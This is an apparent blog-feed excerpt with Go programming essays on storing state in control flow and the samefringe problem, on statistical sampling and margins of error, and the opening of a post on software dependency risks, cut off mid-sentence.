<code>NewIter</code>, this is straightforward: <pre>func SameValues[V comparable](t1, t2 *Tree[V]) bool { it1 := t1.NewIter() it2 := t2.NewIter() for { v1, ok1 := it1.Next() v2, ok2 := it2.Next() if v1 != v2 || ok1 != ok2 { return false } if !ok1 &amp;&amp; !ok2 { return true } } } </pre> <p> This program cannot be written as easily using <code>All</code>, the argument goes, because <code>SameValues</code> wants to use its own control flow (advancing two lists in lockstep) that cannot be replaced by <code>All</code>’s control flow (recursion over the tree). But this is a false dichotomy, the same one we saw with <code>parseQuoted</code> and the base64 decoder. If two different functions have different demands on control flow state, they can run in different control flows. 
<p> <p> In our case, we can write this instead: <pre><span style="color: #aaa">func SameValues[V comparable](t1, t2 *Tree[V]) bool {</span> c1 := make(chan V) c2 := make(chan V) go gopher(c1, t1.All) go gopher(c2, t2.All) <span style="color: #aaa"> for {</span> v1, ok1 := &lt;-c1 v2, ok2 := &lt;-c2 <span style="color: #aaa"> if v1 != v2 || ok1 != ok2 {</span> <span style="color: #aaa"> return false</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> if !ok1 &amp;&amp; !ok2 {</span> <span style="color: #aaa"> return true</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }</span> <span style="color: #aaa">}</span> <span style="color: #aaa"></span> func gopher[V any](c chan&lt;- V, all func(func(V))) { all(func(v V) { c &lt;- v }) close(c) } </pre> <p> The function <code>gopher</code> uses <code>all</code> to walk a tree, announcing each value into a channel. After the walk, it closes the channel. <p> <code>SameValues</code> starts two concurrent gophers, each of which walks one tree and announces the values into one channel. Then <code>SameValues</code> does exactly the same loop as before to compare the two value streams. <p> Note that <code>gopher</code> is not specific to binary trees in any way: it applies to <i>any</i> iteration function. That is, the general idea of starting a goroutine to run the <code>All</code> method works for converting any code-state-based iteration into an incremental iterator. My next post, “<a href="coro">Coroutines for Go</a>,” expands on this idea. <a class=anchor href="#limits"><h2 id="limits">Limitations</h2></a> <p> This approach of storing data in control flow is not a panacea. Here are a few caveats: <ul> <li> <p> If the state needs to evolve in ways that don’t naturally map to control flow, then it’s usually best to leave the state as data. For example, the state maintained by a node in a distributed system is usually not best represented in control flow, because timeouts, errors, and other unexpected events tend to require adjusting the state in unpredictable ways. <li> <p> If the state needs to be serialized for operations like snapshots, or sending over a network, that’s usually easier with data than code. <li> <p> When you do need to create multiple control flows to hold different control flow state, the helper control flows need to be shut down. When <code>SameValues</code> returns false, it leaves the two concurrent <code>gopher</code>s blocked waiting to send their next values. Instead, it should unblock them. That requires communication in the other direction to tell <code>gopher</code> to stop early. “<a href="coro">Coroutines for Go</a>” shows that. <li> <p> In the multiple thread case, the switching costs can be significant. On my laptop, a C thread switch takes a few microseconds. A channel operation and goroutine switch is an order of magnitude cheaper: a couple hundred nanoseconds. An optimized coroutine system can reduce the cost to tens of nanoseconds or less.</ul> <p> In general, storing data in control flow is a valuable tool for writing clean, simple, maintainable programs. Like all tools, it works very well for some jobs and not as well for others. <a class=anchor href="#gopher"><h2 id="gopher">Counterpoint: John McCarthy’s GOPHER</h2></a> <p> The idea of using concurrency to align a pair of binary trees is over 50 years old. 
It first appeared in Charles Prenner’s “<a href="https://dl.acm.org/doi/abs/10.1145/942582.807990">The control structure facilities of ECL</a>” (<i>ACM SIGPLAN Notices</i>, Volume 6, Issue 12, December 1971; see pages 106–109). In that presentation, titled “Tree Walks Using Coroutines”, the problem was to take two binary trees A and B with the same number of nodes and copy the value sequence from A into B despite the two having different internal structure. They present a straightforward coroutine-based variant. <p> Brian Smith and Carl Hewitt introduced the problem of simply comparing two Lisp-style cons trees (in which internal nodes carry no values) in their draft of “<a href="https://www.scribd.com/document/185900689/A-Plasma-Primer">A Plasma Primer</a>” (March 1975; see pages 61–62). For that problem, which they named “samefringe”, they used continuation-based actors to run a pair of “fringe” actors (credited to Howie Shrobe) over the two trees and report nodes back to a comparison loop. <p> Gerald Sussman and Guy Steele presented the samefringe problem again, in “<a href="https://dspace.mit.edu/bitstream/handle/1721.1/5794/AIM-349.pdf">Scheme: An Interpreter for Extended Lambda Calculus</a>” (December 1975; see pages 8–9), with roughly equivalent code (crediting Smith, Hewitt, and Shrobe for inspiration). They refer to it as a “classic problem difficult to solve in most programming languages”. <p> In August 1976, <i>ACM SIGART Bulletin</i> published Patrick Greussay’s “<a href="https://dl.acm.org/doi/10.1145/1045270.1045273">An Iterative Lisp Solution to the Samefringe Problem</a>”. This prompted <a href="https://dl.acm.org/action/showFmPdf?doi=10.1145%2F1045276">a response letter by Tim Finin and Paul Rutler in the November 1976 issue</a> (see pages 4–5) pointing out that Greussay’s solution runs in quadratic time and memory but also remarking that “the SAMEFRINGE problem has been notoriously overused as a justification for coroutines.” That discussion prompted <a href="https://dl.acm.org/action/showFmPdf?doi=10.1145%2F1045283">a response letter by John McCarthy in the February 1977 issue</a> (see page 4). <p> In his response, titled “Another samefringe”, McCarthy gives the following LISP solution: <pre>(DE SAMEFRINGE (X Y) (OR (EQ X Y) (AND (NOT (ATOM X)) (NOT (ATOM Y)) (SAME (GOPHER X) (GOPHER Y))))) (DE SAME (X Y) (AND (EQ (CAR X) (CAR Y)) (SAMEFRINGE (CDR X) (CDR Y)))) (DE GOPHER (U) (COND ((ATOM (CAR U)) U) (T (GOPHER (CONS (CAAR U) (CONS (CDAR U) (CDR U))))))) </pre> <p> He then explains:<blockquote> <p> <i>gopher</i> digs up the first atom in an S-expression, piling up the <i>cdr</i> parts (with its hind legs) so that indexing through the atoms can be resumed. Because of shared structure, the number of new cells in use in each argument at any time (apart from those occupied by the original expression and assuming iterative execution) is the number of <i>cars</i> required to go from the top to the current atom – usually a small fraction of the size of the S-expression.</blockquote> <p> In modern terms, McCarthy’s <code>GOPHER</code> loops applying <a href="https://en.wikipedia.org/wiki/Tree_rotation">right tree rotations</a> until the leftmost node is at the top of the tree. <code>SAMEFRINGE</code> applies <code>GOPHER</code> to the two trees, compares the tops, and then loops to consider the remainders. 
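<p> To make that concrete, here is a rough Go rendering of the rotation-based approach, reusing the <code>Tree</code> type from earlier (just a sketch of the idea, not a translation of McCarthy’s code): <pre>// gopherize applies right rotations until the leftmost node is on top,
// building new nodes so the original tree is left untouched.
func gopherize[V any](t *Tree[V]) *Tree[V] {
	for t.left != nil {
		// Rotate right: lift t.left above t.
		t = &amp;Tree[V]{
			left:  t.left.left,
			value: t.left.value,
			right: &amp;Tree[V]{left: t.left.right, value: t.value, right: t.right},
		}
	}
	return t
}

// sameFringe compares the in-order value sequences of two trees
// without any extra control flows, in the style of SAMEFRINGE.
func sameFringe[V comparable](t1, t2 *Tree[V]) bool {
	for t1 != nil &amp;&amp; t2 != nil {
		t1, t2 = gopherize(t1), gopherize(t2)
		if t1.value != t2.value {
			return false
		}
		t1, t2 = t1.right, t2.right
	}
	return t1 == t2
}
</pre> <p> Like McCarthy’s version, this allocates new nodes along the left spine instead of keeping an explicit stack or starting a goroutine.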
<p> After presenting a second, more elaborate solution, McCarthy remarks:<blockquote> <p> I think all this shows that <i>samefringe</i> is not an example of the need for co-routines, and a new “simplest example” should be found. There is no merit in merely moving information from data structure to control structure, and it makes some kinds of modification harder.</blockquote> <p> I disagree with “no merit”. We can view McCarthy’s <code>GOPHER</code>-ized trees as an encoding of the same stack that <code>NewIter</code> maintains but in tree form. The correctness follows for the same reasons: it is simulating a simple recursive traversal. This <code>GOPHER</code> is clever, but it only works on trees. If you’re not John McCarthy, it’s easier to write the recursive traversal and then rely on the general, concurrency-based <code>gopher</code> we saw earlier to do the rest. <p> My experience is that when it is possible, moving information from data structure to control structure usually makes programs clearer, easier to understand, and easier to maintain. I hope you find similar results. The Magic of Sampling, and its Limitations tag:research.swtch.com,2012:research.swtch.com/sample 2023-02-04T12:00:00-05:00 2023-02-04T12:02:00-05:00 The magic of using small samples to learn about large data sets. <p> Suppose I have a large number of M&amp;Ms and want to estimate what fraction of them have <a href="https://spinroot.com/pjw">Peter’s face</a> on them. As one does. <p> <img name="sample-pjw1" class="center pad resizable" width=450 height=276 src="sample-pjw1.jpg" srcset="sample-pjw1.jpg 1x, sample-pjw1@2x.jpg 2x, sample-pjw1@4x.jpg 4x"> <p> If I am too lazy to count them all, I can estimate the true fraction using sampling: pick N at random, count how many of them (P) have Peter’s face, and then estimate the fraction to be P/N. <p> I can <a href="https://go.dev/play/p/GQr6ShQ_ivG">write a Go program</a> to pick 10 of the 37 M&amp;Ms for me: 27 30 1 13 36 5 33 7 10 19. (Yes, I am too lazy to count them, but I was not too lazy to number the M&amp;Ms in order to use the Go program.) <p> <img name="sample-pjw2" class="center pad resizable" width=450 height=73 src="sample-pjw2.jpg" srcset="sample-pjw2.jpg 1x, sample-pjw2@2x.jpg 2x, sample-pjw2@4x.jpg 4x"> <p> Based on this sample, we can estimate that 3/10 = 30% of my M&amp;Ms have Peter’s face. We can do it a few more times: <p> <img name="sample-pjw3" class="center pad resizable" width=450 height=64 src="sample-pjw3.jpg" srcset="sample-pjw3.jpg 1x, sample-pjw3@2x.jpg 2x, sample-pjw3@4x.jpg 4x"> <p> <img name="sample-pjw4" class="center pad resizable" width=450 height=61 src="sample-pjw4.jpg" srcset="sample-pjw4.jpg 1x, sample-pjw4@2x.jpg 2x, sample-pjw4@4x.jpg 4x"> <p> <img name="sample-pjw5" class="center pad resizable" width=450 height=73 src="sample-pjw5.jpg" srcset="sample-pjw5.jpg 1x, sample-pjw5@2x.jpg 2x, sample-pjw5@4x.jpg 4x"> <p> And we get a few new estimates: 30%, 40%, 20%. The actual fraction turns out to be 9/37 = 24.3%. These estimates are perhaps not that impressive, but we are only using 10 samples. With not too many more samples, we can get far more accurate estimates, even for much larger data sets. Suppose we had many more M&amp;Ms, again 24.3% Peter faces, and we sample 100 of them, or 1,000, or 10,000. Since we’re lazy, let’s write <a href="https://go.dev/play/p/VcqirSSiS1Q">a program to simulate the process</a>. 
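<p> That simulation can be quite short; a minimal sketch of it (the linked program may differ in its details) looks like this: <pre>// sample.go: simulate estimating a 24.3% fraction
// using different sample sizes, ten trials each.
package main

import (
	"fmt"
	"math/rand"
)

func main() {
	const p = 9.0 / 37 // true fraction of Peter faces
	for _, n := range []int{10, 100, 1000, 10000} {
		fmt.Printf("%5d:", n)
		for trial := 0; trial &lt; 10; trial++ {
			count := 0
			for i := 0; i &lt; n; i++ {
				if rand.Float64() &lt; p {
					count++
				}
			}
			fmt.Printf(" %.1f%%", 100*float64(count)/float64(n))
		}
		fmt.Printf("\n")
	}
}
</pre>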
<pre>$ go run sample.go 10: 40.0% 20.0% 30.0% 0.0% 10.0% 30.0% 10.0% 20.0% 20.0% 0.0% 100: 25.0% 26.0% 21.0% 26.0% 15.0% 25.0% 30.0% 30.0% 29.0% 20.0% 1000: 24.7% 23.8% 21.0% 25.4% 25.1% 24.2% 25.7% 22.9% 24.0% 23.8% 10000: 23.4% 24.6% 24.3% 24.3% 24.7% 24.6% 24.6% 24.7% 24.1% 25.0% $ </pre> <p> Accuracy improves fairly quickly: <ul> <li> With 10 samples, our estimates are accurate to within about 15%. <li> With 100 samples, our estimates are accurate to within about 5%. <li> With 1,000 samples, our estimates are accurate to within about 3%. <li> With 10,000 samples, our estimates are accurate to within about 1%.</ul> <p> Because we are estimating only the percentage of Peter faces, not the total number, the accuracy (also measured in percentages) does not depend on the total number of M&amp;Ms, only on the number of samples. So 10,000 samples is enough to get roughly 1% accuracy whether we have 100,000 M&amp;Ms, 1 million M&amp;Ms, or even 100 billion M&amp;Ms! In the last scenario, we have 1% accuracy despite only sampling 0.00001% of the M&amp;Ms. <p> <b>The magic of sampling is that we can derive accurate estimates about a very large population using a relatively small number of samples.</b> <p> Sampling turns many one-off estimations into jobs that are feasible to do by hand. For example, suppose we are considering revising an error-prone API and want to estimate how often that API is used incorrectly. If we have a way to randomly sample uses of the API (maybe <code>grep -Rn pkg.Func . | shuffle -m 100</code>), then manually checking 100 of them will give us an estimate that’s accurate to within 5% or so. And checking 1,000 of them, which may not take more than an hour or so if they’re easy to eyeball, improves the accuracy to 1.5% or so. Real data to decide an important question is usually well worth a small amount of manual effort. <p> For the kinds of decisions I look at related to Go, this approach comes up all the time: What fraction of <code>for</code> loops in real code have a <a href="https://github.com/golang/go/discussions/56010">loop scoping bug</a>? What fraction of warnings by a new <code>go</code> <code>vet</code> check are false positives? What fraction of modules have no dependencies? These are drawn from my experience, and so they may seem specific to Go or to language development, but once you realize that sampling makes accurate estimates so easy to come by, all kind of uses present themselves. Any time you have a large data set, <pre>select * from data order by random() limit 1000; </pre> <p> is a very effective way to get a data set you can analyze by hand and still derive many useful conclusions from. <a class=anchor href="#accuracy"><h2 id="accuracy">Accuracy</h2></a> <p> Let’s work out what accuracy we should expect from these estimates. The brute force approach would be to run many samples of a given size and calculate the accuracy for each. <a href="https://go.dev/play/p/NWUOanCpFtl">This program</a> runs 1,000 trials of 100 samples each, calculating the observed error for each estimate and then printing them all in sorted order. If we plot those points one after the other along the x axis, we get a picture like this: <p> <img name="sample1" class="center pad" width=370 height=369 src="sample1.png" srcset="sample1.png 1x, sample1@2x.png 2x"> <p> The <a href="https://9fans.github.io/plan9port/man/man1/gview.html">data viewer I’m using in this screenshot</a> has scaled the x-axis labels by a factor of 1,000 (“x in thousands”). 
Eyeballing the scatterplot, we can see that half the time the error is under 3%, and 80% of the time the error is under 5½%. <p> We might wonder at this point whether the error depends on the actual answer (24.3% in our programs so far). It does: the error will be lower when the population is lopsided. Obviously, if the M&amp;Ms are 0% or 100% Peter faces, our estimates will have no error at all. In a slightly less degenerate case, if the M&amp;Ms are 1% or 99% Peter faces, the most likely estimate from just a few samples is 0% or 100%, which has only 1% error. It turns out that, in general, the error is maximized when the actual fraction is 50%, so <a href="https://go.dev/play/p/Vm2s1SwlKKT">we’ll use that</a> for the rest of the analysis. <p> With an actual fraction of 50%, 1,000 sorted errors from estimating by sampling 100 values look like: <p> <img name="sample2" class="center pad" width=369 height=369 src="sample2.png" srcset="sample2.png 1x, sample2@2x.png 2x"> <p> The errors are a bit larger. Now half the time the error is under 4% and 80% of the time the error is under 6%. Zooming in on the tail end of the plot produces: <p> <img name="sample3" class="center pad" width=390 height=368 src="sample3.png" srcset="sample3.png 1x, sample3@2x.png 2x"> <p> We can see that 90% of the trials have error 8% or less, 95% of the trials have error 10% or less, and 99% of the trials have error 12% or less. The statistical way to phrase those statements is that “a sample of size N = 100 produces a margin of error of 8% with 90% confidence, 10% with 95% confidence, and 12% with 99% confidence.” <p> Instead of eyeballing the graphs, we can <a href="https://go.dev/play/p/Xq7WMyrNWxq">update the program</a> to compute these numbers directly. <pre>$ go run sample.go N = 10: 90%: 30.00% 95%: 30.00% 99%: 40.00% N = 100: 90%: 9.00% 95%: 11.00% 99%: 13.00% N = 1000: 90%: 2.70% 95%: 3.20% 99%: 4.30% N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.24% $ </pre> <p> There is something meta about using sampling (of trials) to estimate the errors introduced by sampling of an actual distribution. What about the error being introduced by sampling the errors? We could instead write a program to count all possible outcomes and calculate the exact error distribution, but counting won’t work for larger sample sizes. Luckily, others have done the math for us and even implemented the relevant functions in Go’s standard <a href="https://pkg.go.dev/math">math package</a>. The margin of error for a given confidence level and sample size is: <pre>func moe(confidence float64, N int) float64 { return math.Erfinv(confidence) / math.Sqrt(2 * float64(N)) } </pre> <p> That lets us compute the table <a href="https://go.dev/play/p/DKeNfDwLmJZ">more directly</a>. 
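<p> A small driver around <code>moe</code> along these lines (a sketch; the linked program may format things differently) prints the table: <pre>package main

import (
	"fmt"
	"math"
)

// moe is the margin-of-error function from above.
func moe(confidence float64, N int) float64 {
	return math.Erfinv(confidence) / math.Sqrt(2*float64(N))
}

func main() {
	sizes := []int{10, 20, 50, 100, 200, 500, 1000,
		2000, 5000, 10000, 20000, 50000, 100000}
	for _, n := range sizes {
		fmt.Printf("N = %6d: 90%%: %5.2f%% 95%%: %5.2f%% 99%%: %5.2f%%\n",
			n, 100*moe(0.90, n), 100*moe(0.95, n), 100*moe(0.99, n))
	}
}
</pre>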
<pre>$ go run sample.go N = 10: 90%: 26.01% 95%: 30.99% 99%: 40.73% N = 20: 90%: 18.39% 95%: 21.91% 99%: 28.80% N = 50: 90%: 11.63% 95%: 13.86% 99%: 18.21% N = 100: 90%: 8.22% 95%: 9.80% 99%: 12.88% N = 200: 90%: 5.82% 95%: 6.93% 99%: 9.11% N = 500: 90%: 3.68% 95%: 4.38% 99%: 5.76% N = 1000: 90%: 2.60% 95%: 3.10% 99%: 4.07% N = 2000: 90%: 1.84% 95%: 2.19% 99%: 2.88% N = 5000: 90%: 1.16% 95%: 1.39% 99%: 1.82% N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.29% N = 20000: 90%: 0.58% 95%: 0.69% 99%: 0.91% N = 50000: 90%: 0.37% 95%: 0.44% 99%: 0.58% N = 100000: 90%: 0.26% 95%: 0.31% 99%: 0.41% $ </pre> <p> We can also reverse the equation to compute the necessary sample size from a given confidence level and margin of error: <pre>func N(confidence, moe float64) int { return int(math.Ceil(0.5 * math.Pow(math.Erfinv(confidence)/moe, 2))) } </pre> <p> That lets us <a href="https://go.dev/play/p/Y81_FORHvw5">compute this table</a>. <pre>$ go run sample.go moe = 5%: 90%: 271 95%: 385 99%: 664 moe = 2%: 90%: 1691 95%: 2401 99%: 4147 moe = 1%: 90%: 6764 95%: 9604 99%: 16588 $ </pre> <a class=anchor href="#limitations"><h2 id="limitations">Limitations</h2></a> <p> To accurately estimate the fraction of items with a given property, like M&amp;Ms with Peter faces, each item must have the same chance of being selected, as each M&amp;M did. Suppose instead that we had ten bags of M&amp;Ms: nine one-pound bags with 500 M&amp;Ms each, and a small bag containing the 37 M&amp;Ms we used before. If we want to estimate the fraction of M&amp;Ms with Peter faces, it would not work to sample by first picking a bag at random and then picking an M&amp;M at random from the bag. The chance of picking any specific M&amp;M from a one-pound bag would be 1/10 × 1/500 = 1/5,000, while the chance of picking any specific M&amp;M from the small bag would be 1/10 × 1/37 = 1/370. We would end up with an estimate of around 9/370 = 2.4% Peter faces, even though the actual answer is 9/(9×500+37) = 0.2% Peter faces. <p> The problem here is not the kind of random sampling error that we computed in the previous section. Instead it is a systematic error caused by a sampling mechanism that does not align with the statistic being estimated. We could recover an accurate estimate by weighting an M&amp;M found in the small bag as only w = 37/500 of an M&amp;M in both the numerator and denominator of any estimate. For example, if we picked 100 M&amp;Ms with replacement from each bag and found 24 Peter faces in the small bag, then instead of 24/1000 = 2.4% we would compute 24w/(900+100w) = 0.2%. <p> As a less contrived example, <a href="https://go.dev/blog/pprof">Go’s memory profiler</a> aims to sample approximately one allocation per half-megabyte allocated and then derive statistics about where programs allocate memory. Roughly speaking, to do this the profiler maintains a sampling trigger, initialized to a random number between 0 and one million. Each time a new object is allocated, the profiler decrements the trigger by the size of the object. When an allocation decrements the trigger below zero, the profiler samples that allocation and then resets the trigger to a new random number between 0 and one million. <p> This byte-based sampling means that to estimate the fraction of bytes allocated in a given function, the profiler can divide the total sampled bytes allocated in that function divided by the total sampled bytes allocated in the entire program. 
Using the same approach to estimate the fraction of <i>objects</i> allocated in a given function would be inaccurate: it would overcount large objects and undercount small ones, because large objects are more likely to be sampled. In order to recover accurate statistics about allocation counts, the profiler applies a size-based weighting function during the calcuation, just as in the M&amp;M example. (This is the reverse of the situation with the M&amp;Ms: we are randomly sampling individual bytes of allocated memory but now want statistics about their “bags”.) <p> It is not always possible to undo skewed sampling, and the skew makes margin of error calculation more difficult too. It is almost always better to make sure that the sampling is aligned with the statistic you want to compute. Our Software Dependency Problem tag:research.swtch.com,2012:research.swtch.com/deps 2019-01-23T11:00:00-05:00 2019-01-23T11:02:00-05:00 Download and run code from strangers on the internet. What could go wrong? <p> For decades, discussion of software reuse was far more common than actual software reuse. Today, the situation is reversed: developers reuse software written by others every day, in the form of software dependencies, and the situation goes mostly unexamined. <p> My own background includes a decade of working with Google’s internal source code system, which treats software dependencies as a first-class concept,<a class=footnote id=body1 href="#note1"><sup>1</sup></a> and also developing support for dependencies in the Go programming language.<a class=footnote id=body2 href="#note2"><sup>2</sup></a> <p> Software dependencies carry with them serious risks that are too often overlooked. The shift to easy, fine-grained software reuse has happened so quickly that we do not yet understand the best practices for choosing and using dependencies effectively, or even for deciding when they are appropriate and when not. My purpose in writing this article is to raise awareness of the risks and encourage more investigation of solutions. <a class=anchor href="#what_is_a_dependency"><h2 id="what_is_a_dependency">What is a dependency?</h2></a> <p> In today’s software development world, a <i>dependency</i> is additional code that you want to call from your program. Adding a dependency avoids repeating work already done: designing, writing, testing, debugging, and maintaining a specific unit of code. In this article we’ll call that unit of code a <i>package</i>; some systems use terms like library or module instead of package. <p> Taking on externally-written dependencies is an old practice: most programmers have at one point in their careers had to go through the steps of manually downloading and installing a required library, like C’s PCRE or zlib, or C++’s Boost or Qt, or Java’s JodaTime or JUnit. These packages contain high-quality, debugged code that required significant expertise to develop. For a program that needs the functionality provided by one of these packages, the tedious work of manually downloading, installing, and updating the package is easier than the work of redeveloping that functionality from scratch. But the high fixed costs of reuse mean that manually-reused packages tend to be big: a tiny package would be easier to reimplement. <p> A <i>dependency manager</i> (sometimes called a package manager) automates the downloading and installation of dependency packages. 
As dependency managers make individual packages easier to download and install, the lower fixed costs make smaller packages economical to publish and reuse. <p> For example, the Node.js dependency manager NPM provides access to over 750,000 packages. One of them, <code>escape-string-regexp</code>, provides a single function that escapes regular expression operators in its input. The entire implementation is: <pre>var matchOperatorsRe = /[|\\{}()[\]^$+*?.]/g; module.exports = function (str) { if (typeof str !== 'string') { throw new TypeError('Expected a string'); } return str.replace(matchOperatorsRe, '\\$&amp;'); }; </pre> <p> Before dependency managers, publishing an eight-line code library would have been unthinkable: too much overhead for too little benefit. But NPM has driven the overhead approximately to zero, with the result that nearly-trivial functionality can be packaged and reused. In late January 2019, the <code>escape-string-regexp</code> package is explicitly depended upon by almost a thousand other NPM packages, not to mention all the packages developers write for their own use and don’t share. <p> Dependency managers now exist for essentially every programming language. Maven Central (Java), Nuget (.NET), Packagist (PHP), PyPI (Python), and RubyGems (Ruby) each host over 100,000 packages. The arrival of this kind of fine-grained, widespread software reuse is one of the most consequential shifts in software development over the past two decades. And if we’re not more careful, it will lead to serious problems. <a class=anchor href="#what_could_go_wrong"><h2 id="what_could_go_wrong">What could go wrong?</h2></a> <p> A package, for this discussion, is code you download from the internet. Adding a package as a dependency outsources the work of developing that code—designing, writing, testing, debugging, and maintaining—to someone else on the internet, someone you often don’t know. By using that code, you are exposing your own program to all the failures and flaws in the dependency. Your program’s execution now literally <i>depends</i> on code downloaded from this stranger on the internet. Presented this way, it sounds incredibly unsafe. Why would anyone do this? <p> We do this because it’s easy, because it seems to work, because everyone else is doing it too, and, most importantly, because it seems like a natural continuation of age-old established practice. But there are important differences we’re ignoring. <p> Decades ago, most developers already trusted others to write software they depended on, such as operating systems and compilers. That software was bought from known sources, often with some kind of support agreement. There was still a potential for bugs or outright mischief,<a class=footnote id=body3 href="#note3"><sup>3</sup></a> but at least we knew who we were dealing with and usually had commercial or legal recourses available. <p> The phenomenon of open-source software, distributed at no cost over the internet, has displaced many of those earlier software purchases. When reuse was difficult, there were fewer projects publishing reusable code packages. Even though their licenses typically disclaimed, among other things, any “implied warranties of merchantability and fitness for a particular purpose,” the projects built up well-known reputations that often factored heavily into people’s decisions about which to use. The commercial and legal support for trusting our software sources was replaced by reputational support. 
Many common early packages still enjoy good reputations: consider BLAS (published 1979), Netlib (1987), libjpeg (1991), LAPACK (1992), HP STL (1994), and zlib (1995). <p> Dependency managers have scaled this open-source code reuse model down: now, developers can share code at the granularity of individual functions of tens of lines. This is a major technical accomplishment. There are myriad available packages, and writing code can involve such a large number of them, but the commercial, legal, and reputational support mechanisms for trusting the code have not carried over. We are trusting more code with less justification for doing so. <p> The cost of adopting a bad dependency can be viewed as the sum, over all possible bad outcomes, of the cost of each bad outcome multiplied by its probability of happening (risk). <p> <img name="deps-cost" class="center pad" width=383 height=95 src="deps-cost.png" srcset="deps-cost.png 1x, deps-cost@1.5x.png 1.5x, deps-cost@2x.png 2x, deps-cost@3x.png 3x, deps-cost@4x.png 4x"> <p> The context where a dependency will be used determines the cost of a bad outcome. At one end of the spectrum is a personal hobby project, where the cost of most bad outcomes is near zero: you’re just having fun, bugs have no real impact other than wasting some time, and even debugging them can be fun. So the risk probability almost doesn’t matter: it’s being multiplied by zero. At the other end of the spectrum is production software that must be maintained for years. Here, the cost of a bug in a dependency can be very high: servers may go down, sensitive data may be divulged, customers may be harmed, companies may fail. High failure costs make it much more important to estimate and then reduce any risk of a serious failure. <p> No matter what the expected cost, experiences with larger dependencies suggest some approaches for estimating and reducing the risks of adding a software dependency. It is likely that better tooling is needed to help reduce the costs of these approaches, much as dependency managers have focused to date on reducing the costs of download and installation. <a class=anchor href="#inspect_the_dependency"><h2 id="inspect_the_dependency">Inspect the dependency</h2></a> <p> You would not hire a software developer you’ve never heard of and know nothing about. You would learn more about them first: check references, conduct a job interview, run background checks, and so on. Before you depend on a package you found on the internet, it is similarly prudent to learn a bit about it first. <p> A basic inspection can give you a sense of how likely you are to run into problems trying to use this code. If the inspection reveals likely minor problems, you can take steps to prepare for or maybe avoid them. If the inspection reveals major problems, it may be best not to use the package: maybe you’ll find a more suitable one, or maybe you need to develop one yourself. Remember that open-source packages are published by their authors in the hope that they will be useful but with no guarantee of usability or support. In the middle of a production outage, you’ll be the one debugging it. As the original GNU General Public License warned, “The entire risk as to the quality and performance of the program is with you. 
Should the program prove defective, you assume the cost of all necessary servicing, repair or correction.”<a class=footnote id=body4 href="#note4"><sup>4</sup></a> <p> The rest of this section outlines some considerations when inspecting a package and deciding whether to depend on it. <a class=anchor href="#design"><h3 id="design">Design</h3></a> <p> Is package’s documentation clear? Does the API have a clear design? If the authors can explain the package’s API and its design well to you, the user, in the documentation, that increases the likelihood they have explained the implementation well to the computer, in the source code. Writing code for a clear, well-designed API is also easier, faster, and hopefully less error-prone. Have the authors documented what they expect from client code in order to make future upgrades compatible? (Examples include the C++<a class=footnote id=body5 href="#note5"><sup>5</sup></a> and Go<a class=footnote id=body6 href="#note6"><sup>6</sup></a> compatibility documents.) <a class=anchor href="#code_quality"><h3 id="code_quality">Code Quality</h3></a> <p> Is the code well-written? Read some of it. Does it look like the authors have been careful, conscientious, and consistent? Does it look like code you’d want to debug? You may need to. <p> Develop your own systematic ways to check code quality. For example, something as simple as compiling a C or C++ program with important compiler warnings enabled (for example, <code>-Wall</code>) can give you a sense of how seriously the developers work to avoid various undefined behaviors. Recent languages like Go, Rust, and Swift use an <code>unsafe</code> keyword to mark code that violates the type system; look to see how much unsafe code there is. More advanced semantic tools like Infer<a class=footnote id=body7 href="#note7"><sup>7</sup></a> or SpotBugs<a class=footnote id=body8 href="#note8"><sup>8</sup></a> are helpful too. Linters are less helpful: you should ignore rote suggestions about topics like brace style and focus instead on semantic problems. <p> Keep an open mind to development practices you may not be familiar with. For example, the SQLite library ships as a single 200,000-line C source file and a single 11,000-line header, the “amalgamation.” The sheer size of these files should raise an initial red flag, but closer investigation would turn up the actual development source code, a traditional file tree with over a hundred C source files, tests, and support scripts. It turns out that the single-file distribution is built automatically from the original sources and is easier for end users, especially those without dependency managers. (The compiled code also runs faster, because the compiler can see more optimization opportunities.) <a class=anchor href="#testing"><h3 id="testing">Testing</h3></a> <p> Does the code have tests? Can you run them? Do they pass? Tests establish that the code’s basic functionality is correct, and they signal that the developer is serious about keeping it correct. For example, the SQLite development tree has an incredibly thorough test suite with over 30,000 individual test cases as well as developer documentation explaining the testing strategy.<a class=footnote id=body9 href="#note9"><sup>9</sup></a> On the other hand, if there are few tests or no tests, or if the tests fail, that’s a serious red flag: future changes to the package are likely to introduce regressions that could easily have been caught. 
If you insist on tests in code you write yourself (you do, right?), you should insist on tests in code you outsource to others. <p> Assuming the tests exist, run, and pass, you can gather more information by running them with run-time instrumentation like code coverage analysis, race detection,<a class=footnote id=body10 href="#note10"><sup>10</sup></a> memory allocation checking, and memory leak detection. <a class=anchor href="#debugging"><h3 id="debugging">Debugging</h3></a> <p> Find the package’s issue tracker. Are there many open bug reports? How long have they been open? Are there many fixed bugs? Have any bugs been fixed recently? If you see lots of open issues about what look like real bugs, especially if they have been open for a long time, that’s not a good sign. On the other hand, if the closed issues show that bugs are rarely found and promptly fixed, that’s great. <a class=anchor href="#maintenance"><h3 id="maintenance">Maintenance</h3></a> <p> Look at the package’s commit history. How long has the code been actively maintained? Is it actively maintained now? Packages that have been actively maintained for an extended amount of time are more likely to continue to be maintained. How many people work on the package? Many packages are personal projects that developers create and share for fun in their spare time. Others are the result of thousands of hours of work by a group of paid developers. In general, the latter kind of package is more likely to have prompt bug fixes, steady improvements, and general upkeep. <p> On the other hand, some code really is “done.” For example, NPM’s <code>escape-string-regexp</code>, shown earlier, may never need to be modified again. <a class=anchor href="#usage"><h3 id="usage">Usage</h3></a> <p> Do many other packages depend on this code? Dependency managers can often provide statistics about usage, or you can use a web search to estimate how often others write about using the package. More users should at least mean more people for whom the code works well enough, along with faster detection of new bugs. Widespread usage is also a hedge against the question of continued maintenance: if a widely-used package loses its maintainer, an interested user is likely to step forward. <p> For example, libraries like PCRE or Boost or JUnit are incredibly widely used. That makes it more likely—although certainly not guaranteed—that bugs you might otherwise run into have already been fixed, because others ran into them first. <a class=anchor href="#security"><h3 id="security">Security</h3></a> <p> Will you be processing untrusted inputs with the package? If so, does it seem to be robust against malicious inputs? Does it have a history of security problems listed in the National Vulnerability Database (NVD)?<a class=footnote id=body11 href="#note11"><sup>11</sup></a> <p> For example, when Jeff Dean and I started work on Google Code Search<a class=footnote id=body12 href="#note12"><sup>12</sup></a>—<code>grep</code> over public source code—in 2006, the popular PCRE regular expression library seemed like an obvious choice. In an early discussion with Google’s security team, 